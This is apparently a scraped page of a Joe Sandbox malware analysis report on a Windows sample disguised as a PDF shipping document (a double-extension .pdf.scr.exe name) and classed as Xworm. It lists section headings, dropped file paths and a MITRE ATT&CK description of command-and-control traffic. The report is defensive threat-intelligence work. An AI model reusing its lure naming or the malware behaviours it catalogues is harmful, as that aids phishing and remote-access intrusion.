Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ltnvgwb.qz5.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gqqqfti.wmj.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3g3v2mv4.c3k.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sqmsmr1.3rv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_doo1jfqc.i2f.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5dziafv.dvh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwix4mu4.0r2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i2k3jbs1.g1g.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iykyorr3.3cb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyq5ekke.w2l.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqz4vs4g.ilf.ps1

Windows Analysis Report
F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Function 00ADD550 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre